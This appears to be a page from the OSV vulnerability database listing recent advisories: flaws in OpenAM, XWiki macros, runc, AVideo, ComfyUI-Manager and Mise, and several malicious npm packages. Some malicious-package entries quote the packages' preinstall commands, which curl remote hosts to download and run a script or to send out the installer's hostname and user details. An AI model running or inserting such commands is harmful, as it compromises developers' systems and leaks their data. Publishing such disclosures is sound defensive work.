Osv - Vulnerabilities List

OsvRecent

887763 matches found

GHSA-C556-Q2MH-477V OpenAM Authenticated Server-Side Request Forgery (SSRF) via `/sessionservice`

OpenAM Open Identity Platform is an open-source Identity and Access Management IAM platform derived from ForgeRock OpenAM, providing SSO, OAuth2, SAML, and OpenID Connect capabilities. It is widely deployed in enterprise environments as a central authentication gateway. The /sessionservice...

8.6CVSS6AI score

Exploits0References3

OSV•added 3 hours ago•2 views

GHSA-W56X-9778-RPPX xwiki-pro-macros has remote code execution from page title and content via excerpt-include macro

Summary The excerpt-include macro does not properly escape the title of the included page and executes the content of the excerpt with the macro's rights. Therefore, it is vulnerable to XWiki syntax injection via the included page's title and content, allowing remote code execution for any user w...

9.9CVSS6.5AI score

Exploits0References2

OSV•added 3 hours ago•5 views

GHSA-XJVP-4FHW-GC47 runc: Malicious image with /dev symlink can trigger limited host filesystem integrity violations

Impact When setting up the container rootfs, setupPtmx and setupDevSymlinks call os.Remove and os.Symlink with a filepath.Join string which allow an image with /dev as a symlink to trick runc into deleting files called ptmx on the host or creating a hardcoded set of symlinks with specific names a...

4.8CVSS5.7AI score0.00011EPSS

Exploits0References2

OSV•added 3 hours ago•3 views

GHSA-2VG8-Q4C2-5CW3 OpenAM has LDAP Injection via `_queryId` Parameter

OpenAM Open Identity Platform is an open-source IAM platform providing SSO, OAuth2, SAML, and OpenID Connect capabilities. The CREST REST API layer exposes user query endpoints under /json/realm/users. In IdentityResourceV1.queryCollection, the HTTP query parameter queryId is passed to a CrestQue...

8.7CVSS6AI score

Exploits0References4

OSV•added 3 hours ago•2 views

GHSA-95JH-7R58-XMXW AVideo has an Authorize.Net Webhook Signature Bypass that Enables Wallet Balance Inflation via Forged Payment Data

Summary The Authorize.Net webhook handler at plugin/AuthorizeNet/webhook.php contains a signature verification bypass that allows an attacker to forge webhook requests with arbitrary payment amounts and target user IDs. By supplying a valid transaction ID from a small legitimate purchase, the...

6.5CVSS6.2AI score

Exploits0References3

OSV•added 3 hours ago•3 views

GHSA-95PQ-HR8P-F5G7 ComfyUI-Manager has an Unprotected Alternate Channel (CWE-420)

Impact An Unprotected Alternate Channel CWE-420 vulnerability was discovered in ComfyUI-Manager versions prior to 3.38. Vulnerability Details In affected versions, ComfyUI-Manager stored its configuration in the user/default/ComfyUI-Manager/ directory, which was accessible via ComfyUI's web APIs...

7.5CVSS5.9AI score0.01361EPSS

Exploits3References5

OSV•added 3 hours ago•3 views

GHSA-WF69-R4MX-43RR AVideo Vulnerable to Unauthenticated .env File Exposure via Official Docker Compose Configuration

Vulnerability Details CWE: CWE-538 - Insertion of Sensitive Information into Externally-Accessible File or Directory The official docker-compose.yml line 61 mounts the entire project root directory as the Apache document root: yaml volumes: - "./:/var/www/html/AVideo" This causes the .env file —...

7.5CVSS5.9AI score

Exploits0References3

OSV•added 5 hours ago•2 views

MAL-2026-6267 Malicious code in vitest-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 27abcc7f2373309feb253b0cc48b1a8bae7c54a3c43aed0c57add697f4067aba Package name vitest-cli impersonates the official Vitest project while declaring empty author, homepage, repository, and bugs metadata. The...

6.1AI score

Exploits0References5

OSV•added 5 hours ago•2 views

MAL-2026-6270 Malicious code in zomato-mcp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...

6AI score

Exploits0References1

OSV•added 5 hours ago•2 views

MAL-2026-6269 Malicious code in zomato-espresso (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...

5.9AI score

Exploits0References1

OSV•added 5 hours ago•2 views

MAL-2026-6268 Malicious code in zomato-core (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5 package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...

5.8AI score

Exploits0References1

OSV•added 5 hours ago•2 views

MAL-2026-6265 Malicious code in sn-internal-testjgsakjdkjadkjah (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261 package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...

6.7AI score

Exploits0References5

OSV•added 5 hours ago•2 views

MAL-2026-6266 Malicious code in test-package-sajsdkashdj (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87 package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the...

6.1AI score

Exploits0References2

OSV•added 6 hours ago•3 views

GHSA-8J8M-P79X-G4JM AVideo's Privilege Escalation via Unguarded Permission Parameters in signUp API Allows Self-Granting Upload/Stream/Meet Permissions

Summary The setapisignUp method in the API plugin accepts emailVerified, canUpload, canStream, and canCreateMeet parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can...

5.3CVSS6AI score

Exploits0References3

OSV•added 6 hours ago•3 views

GHSA-FJJ5-V948-WHJJ Mise Vulnerable to Arbitrary Code Execution via Tera Templates in .tool-versions Files (Trust Bypass)

Summary Mise processes .tool-versions files through the Tera template engine during parsing, with the exec function registered, enabling arbitrary command execution. Unlike .mise.toml files, .tool-versions files are not subject to trust verification in non-paranoid mode. This means an attacker ca...